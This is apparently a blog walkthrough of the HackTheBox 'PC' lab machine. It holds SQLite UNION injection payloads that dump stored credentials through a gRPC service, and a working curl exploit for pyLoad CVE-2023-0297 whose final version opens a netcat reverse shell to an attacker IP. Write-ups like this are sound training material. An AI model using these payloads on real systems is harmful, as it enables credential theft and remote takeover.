PC — HackTheBox

Abdul Wassay (Hot Plugin)
5 min readOct 6, 2023

--

PC is an easy machine from HackTheBox. It involves identifying and exploiting SQL injection in gRPC service to dump database for foothold, and exploiting CVE-2023–0297 (RCE in pyLoad) for escalating privileges to root.

NMAP

PORT      STATE SERVICE VERSION                                                                                                        
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 91bf44edea1e3224301f532cea71e5ef (RSA)
| 256 8486a6e204abdff71d456ccf395809de (ECDSA)
|_ 256 1aa89572515e8e3cf180f542fd0a281c (ED25519)
50051/tcp open unknown

Port 50051

Connecting to port 50051, it gives the following error after some time. We can google this error to identify the running service on this port.

Google shows that it’s gRPC service

gRPC is a modern, open source, high-performance remote procedure call (RPC) framework that can run anywhere. gRPC enables client and server applications to communicate transparently, and simplifies the building of connected systems.

We can interact with the service using gRPC UI.

Download the grpcui binary and run it

./grpcui -plaintext 10.10.11.214:50051

Now in the browser, we can interact with service and invoke calls

I provided the admin:admin username and password for LoginUser method and got the following response

Now changing the method to getInfo, provided the id and token that we got when logged in

It gave following message

SQL Injection

Again going back and adding the ' in id

and then it gives following error. From error message, it seems like a python application.

Now, we can confirm that it’s vulnerable to SQL injection by adding the SQL comment

and this time it works normally

The next step is identify the type and number of columns being returned. It can be identified by following payload that only one column is returned

Next we determine that it’s a sqlite db and using following payload, we find that there are two tables (accounts and messages) in the db.

101 UNION SELECT group_concat(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%'-- -

The accounts table interesting. Using following payload, the columns in the table can be determined

101 UNION SELECT sql FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name ='accounts'-- -

Finally, using following, we dump the accounts table and get two credentials. One that we already know and other one is new.

101 UNION SELECT group_concat(username || ":" || password,";") from accounts-- -

Using the new set of credentials, we can login via SSH

Privilege Escalation

Checking the port, it seems that port 8000 is open internally.

Curling the url, it seems to be redirecting on some sorta login page

We can forward this port on our host to further test it

ssh -L 8000:127.0.0.1:8000 sau@10.10.11.214

And access it on localhost. It’s pyload login page.

Pyload is a free and open source download manager written in Python and designed to be extremely lightweight, easily extensible and fully manageable via web.

The credentials that we already have, does not work. Searching on google, it can be found that it’s vulnerable to CVE-2023–0297.

https://github.com/bAuh0lz/CVE-2023-0297_Pre-auth_RCE_in_pyLoad

We can confirm the vulnerability by checking the version

And also by exploiting it using the provided payload

curl -i -s -k -X $'POST' \
--data-binary $'jk=pyimport%20os;os.system(\"id%20>%20/tmp/pwnd\");f=function%20f2(){};&package=xxx&crypted=AAAA&&passwords=aaaa' \
$'http://localhost:8000/flash/addcrypted2'

Finally, we can get a reverse shell or just read the flag. I got the reverse shell using following payload

curl -i -s -k -X $'POST' \
--data-binary $'jk=pyimport%20os;os.system(\"rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fbash%20-i%202%3E%261%7Cnc%2010.10.14.82%20443%20%3E%2Ftmp%2Ff\");f=function%20f2(){};&package=xxx&crypted=AAAA&&passwords=aaaa' \
$'http://localhost:8000/flash/addcrypted2'

References

--

--

No responses yet